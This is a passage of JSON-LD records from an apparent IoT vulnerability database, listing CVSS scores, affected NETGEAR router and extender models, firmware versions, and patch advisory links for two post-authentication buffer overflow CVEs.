"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 4.6,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 3.9,
"id": "CVE-2019-20731",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.0,
"vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Local",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 4.6,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "JVNDB-2019-015432",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 4.6,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 3.9,
"id": "CNVD-2021-63378",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 6.7,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 0.8,
"id": "CVE-2019-20731",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"author": "cve@mitre.org",
"availabilityImpact": "LOW",
"baseScore": 5.6,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 0.8,
"id": "CVE-2019-20731",
"impactScore": 4.7,
"integrityImpact": "LOW",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:L/A:L",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Local",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 6.7,
"baseSeverity": "Medium",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "JVNDB-2019-015432",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "High",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2019-20731",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "cve@mitre.org",
"id": "CVE-2019-20731",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "JVNDB-2019-015432",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNVD",
"id": "CNVD-2021-63378",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-202004-1342",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-63378"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-015432"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1342"
},
{
"db": "NVD",
"id": "CVE-2019-20731"
},
{
"db": "NVD",
"id": "CVE-2019-20731"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Certain NETGEAR devices are affected by a buffer overflow by an authenticated user. This affects D6220 before 1.0.0.40, D6400 before 1.0.0.74, D7000v2 before 1.0.0.74, D8500 before 1.0.3.39, EX3700 before 1.0.0.70, EX3800 before 1.0.0.70, EX6000 before 1.0.0.30, EX6100 before 1.0.2.22, EX6120 before 1.0.0.40, EX6130 before 1.0.0.22, EX6150v1 before 1.0.0.42, EX6200 before 1.0.3.88, EX7000 before 1.0.0.66, R6250 before 1.0.4.20, R6300v2 before 1.0.4.18, R6400v2 before 1.0.2.52, R6700 before 1.0.1.44, R6900 before 1.0.1.46, R7000 before 1.0.9.26, R6900P before 1.3.0.20, R7000P before 1.3.0.20, R7100LG before 1.0.0.34, R7300DST before 1.0.0.62, R8000 before 1.0.4.12, R7900P before 1.3.0.10, R8000P before 1.3.0.10, R8300 before 1.0.2.116, R8500 before 1.0.2.116, WN2500RPv2 before 1.0.1.54, and WNDR3400v3 before 1.0.1.18. plural NETGEAR A classic buffer overflow vulnerability exists on the device.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. NETGEAR EX7000, etc. are all wireless routers from NETGEAR. The vulnerability stems from the fact that when the network system or product performs operations on the memory, the data boundary is not correctly verified, resulting in incorrect read and write operations to other associated memory locations. Attackers can use this vulnerability to cause buffer overflow or heap overflow",
"sources": [
{
"db": "NVD",
"id": "CVE-2019-20731"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-015432"
},
{
"db": "CNVD",
"id": "CNVD-2021-63378"
}
],
"trust": 2.16
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2019-20731",
"trust": 3.0
},
{
"db": "JVNDB",
"id": "JVNDB-2019-015432",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2021-63378",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1342",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-63378"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-015432"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1342"
},
{
"db": "NVD",
"id": "CVE-2019-20731"
}
]
},
"id": "VAR-202004-0803",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-63378"
}
],
"trust": 1.0628947815625
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-63378"
}
]
},
"last_update_date": "2024-11-23T22:44:36.815000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Security Advisory for Post-Authentication Buffer Overflow on Some Routers, Gateways, and Extenders, PSV-2017-2254",
"trust": 0.8,
"url": "https://kb.netgear.com/000061196/Security-Advisory-for-Post-Authentication-Buffer-Overflow-on-Some-Routers-Gateways-and-Extenders-PSV-2017-2254"
},
{
"title": "Patch for NETGEAR buffer overflow vulnerability (CNVD-2021-63378)",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/287161"
},
{
"title": "Multiple NETGEAR Product Buffer Error Vulnerability Fix",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=114880"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-63378"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-015432"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1342"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-120",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-015432"
},
{
"db": "NVD",
"id": "CVE-2019-20731"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.0,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-20731"
},
{
"trust": 1.6,
"url": "https://kb.netgear.com/000061196/security-advisory-for-post-authentication-buffer-overflow-on-some-routers-gateways-and-extenders-psv-2017-2254"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-20731"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-63378"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-015432"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1342"
},
{
"db": "NVD",
"id": "CVE-2019-20731"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2021-63378"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-015432"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1342"
},
{
"db": "NVD",
"id": "CVE-2019-20731"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-08-19T00:00:00",
"db": "CNVD",
"id": "CNVD-2021-63378"
},
{
"date": "2020-05-19T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-015432"
},
{
"date": "2020-04-16T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202004-1342"
},
{
"date": "2020-04-16T20:15:13.397000",
"db": "NVD",
"id": "CVE-2019-20731"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-08-19T00:00:00",
"db": "CNVD",
"id": "CNVD-2021-63378"
},
{
"date": "2020-05-19T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-015432"
},
{
"date": "2020-04-26T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202004-1342"
},
{
"date": "2024-11-21T04:39:12.623000",
"db": "NVD",
"id": "CVE-2019-20731"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "local",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202004-1342"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural NETGEAR Classic buffer overflow vulnerability in device",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-015432"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "buffer error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202004-1342"
}
],
"trust": 0.6
}
}
var-202012-1186
Vulnerability from variot
Certain NETGEAR devices are affected by a buffer overflow by an authenticated user. This affects D3600 before 1.0.0.76, D6000 before 1.0.0.76, D6200 before 1.1.00.36, D7000 before 1.0.1.70, EX6200v2 before 1.0.1.78, EX7000 before 1.0.1.78, EX8000 before 1.0.1.186, JR6150 before 1.0.1.18, PR2000 before 1.0.0.28, R6020 before 1.0.0.42, R6050 before 1.0.1.18, R6080 before 1.0.0.42, R6120 before 1.0.0.46, R6220 before 1.1.0.80, R6260 before 1.1.0.64, R6300v2 before 1.0.4.34, R6700 before 1.0.2.6, R6700v2 before 1.2.0.36, R6800 before 1.2.0.36, R6900 before 1.0.2.4, R6900P before 1.3.1.64, R6900v2 before 1.2.0.36, R7000 before 1.0.9.42, R7000P before 1.3.1.64, R7800 before 1.0.2.60, R8900 before 1.0.4.12, R9000 before 1.0.4.12, and XR500 before 2.3.2.40. plural NETGEAR A classic buffer overflow vulnerability exists in the device.Information is obtained, information is tampered with, and service is disrupted (DoS) It may be put into a state
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202012-1186",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "r6300",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.34"
},
{
"model": "r9000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.12"
},
{
"model": "d6000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.76"
},
{
"model": "r7000p",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.3.1.64"
},
{
"model": "r6080",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.42"
},
{
"model": "r6050",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.18"
},
{
"model": "r6220",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.1.0.80"
},
{
"model": "d3600",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.76"
},
{
"model": "r6700",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.2.0.36"
},
{
"model": "ex8000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.186"
},
{
"model": "d6200",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.1.00.36"
},
{
"model": "jr6150",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.18"
},
{
"model": "r6020",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.42"
},
{
"model": "r6900",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.2.0.36"
},
{
"model": "pr2000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.28"
},
{
"model": "r6260",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.1.0.64"
},
{
"model": "ex7000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.78"
},
{
"model": "r6800",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.2.0.36"
},
{
"model": "r7800",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.60"
},
{
"model": "xr500",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "2.3.2.40"
},
{
"model": "ex6200",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.78"
},
{
"model": "r8900",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.12"
},
{
"model": "r6120",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.46"
},
{
"model": "r6900p",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.3.1.64"
},
{
"model": "d7000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.70"
},
{
"model": "r7000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.9.42"
},
{
"model": "r6700",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.6"
},
{
"model": "r6900",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.4"
},
{
"model": "d3600",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "ex6200",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "d7000",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "jr6150",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "d6000",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "ex8000",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "pr2000",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "ex7000",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "d6200",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "r6020",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-014979"
},
{
"db": "NVD",
"id": "CVE-2020-35787"
}
]
},
"cve": "CVE-2020-35787",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "SINGLE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 5.2,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 5.1,
"id": "CVE-2020-35787",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.8,
"vectorString": "AV:A/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 8.0,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.1,
"id": "CVE-2020-35787",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 2.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Adjacent Network",
"author": "OTHER",
"availabilityImpact": "High",
"baseScore": 8.0,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "JVNDB-2020-014979",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2020-35787",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "cve@mitre.org",
"id": "CVE-2020-35787",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2020-35787",
"trust": 0.8,
"value": "High"
},
{
"author": "CNNVD",
"id": "CNNVD-202012-1789",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-014979"
},
{
"db": "CNNVD",
"id": "CNNVD-202012-1789"
},
{
"db": "NVD",
"id": "CVE-2020-35787"
},
{
"db": "NVD",
"id": "CVE-2020-35787"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Certain NETGEAR devices are affected by a buffer overflow by an authenticated user. This affects D3600 before 1.0.0.76, D6000 before 1.0.0.76, D6200 before 1.1.00.36, D7000 before 1.0.1.70, EX6200v2 before 1.0.1.78, EX7000 before 1.0.1.78, EX8000 before 1.0.1.186, JR6150 before 1.0.1.18, PR2000 before 1.0.0.28, R6020 before 1.0.0.42, R6050 before 1.0.1.18, R6080 before 1.0.0.42, R6120 before 1.0.0.46, R6220 before 1.1.0.80, R6260 before 1.1.0.64, R6300v2 before 1.0.4.34, R6700 before 1.0.2.6, R6700v2 before 1.2.0.36, R6800 before 1.2.0.36, R6900 before 1.0.2.4, R6900P before 1.3.1.64, R6900v2 before 1.2.0.36, R7000 before 1.0.9.42, R7000P before 1.3.1.64, R7800 before 1.0.2.60, R8900 before 1.0.4.12, R9000 before 1.0.4.12, and XR500 before 2.3.2.40. plural NETGEAR A classic buffer overflow vulnerability exists in the device.Information is obtained, information is tampered with, and service is disrupted (DoS) It may be put into a state",
"sources": [
{
"db": "NVD",
"id": "CVE-2020-35787"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-014979"
}
],
"trust": 1.62
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2020-35787",
"trust": 2.4
},
{
"db": "JVNDB",
"id": "JVNDB-2020-014979",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-202012-1789",
"trust": 0.6
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-014979"
},
{
"db": "CNNVD",
"id": "CNNVD-202012-1789"
},
{
"db": "NVD",
"id": "CVE-2020-35787"
}
]
},
"id": "VAR-202012-1186",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.36104530079999997
},
"last_update_date": "2024-11-23T22:54:56.981000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Security\u00a0Advisory\u00a0for\u00a0Post-Authentication\u00a0Buffer\u00a0Overflow\u00a0on\u00a0Some\u00a0Routers\u00a0and\u00a0Range\u00a0Extenders,\u00a0PSV-2018-0379",
"trust": 0.8,
"url": "https://kb.netgear.com/000062710/Security-Advisory-for-Post-Authentication-Buffer-Overflow-on-Some-Routers-and-Range-Extenders-PSV-2018-0379"
},
{
"title": "NETGEAR Buffer error vulnerability fix",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=138158"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-014979"
},
{
"db": "CNNVD",
"id": "CNNVD-202012-1789"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-120",
"trust": 1.0
},
{
"problemtype": "Classic buffer overflow (CWE-120) [NVD Evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-014979"
},
{
"db": "NVD",
"id": "CVE-2020-35787"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.6,
"url": "https://kb.netgear.com/000062710/security-advisory-for-post-authentication-buffer-overflow-on-some-routers-and-range-extenders-psv-2018-0379"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-35787"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-014979"
},
{
"db": "CNNVD",
"id": "CNNVD-202012-1789"
},
{
"db": "NVD",
"id": "CVE-2020-35787"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "JVNDB",
"id": "JVNDB-2020-014979"
},
{
"db": "CNNVD",
"id": "CNNVD-202012-1789"
},
{
"db": "NVD",
"id": "CVE-2020-35787"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-09-07T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2020-014979"
},
{
"date": "2020-12-29T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202012-1789"
},
{
"date": "2020-12-30T00:15:13.533000",
"db": "NVD",
"id": "CVE-2020-35787"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-09-07T06:17:00",
"db": "JVNDB",
"id": "JVNDB-2020-014979"
},
{
"date": "2021-01-05T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202012-1789"
},
{
"date": "2024-11-21T05:28:05.810000",
"db": "NVD",
"id": "CVE-2020-35787"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote or local",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202012-1789"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural \u00a0NETGEAR\u00a0 Classic buffer overflow vulnerability in device",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-014979"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "buffer error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202012-1789"
}
],
"trust": 0.6
}
}
var-202004-1335
Vulnerability from variot
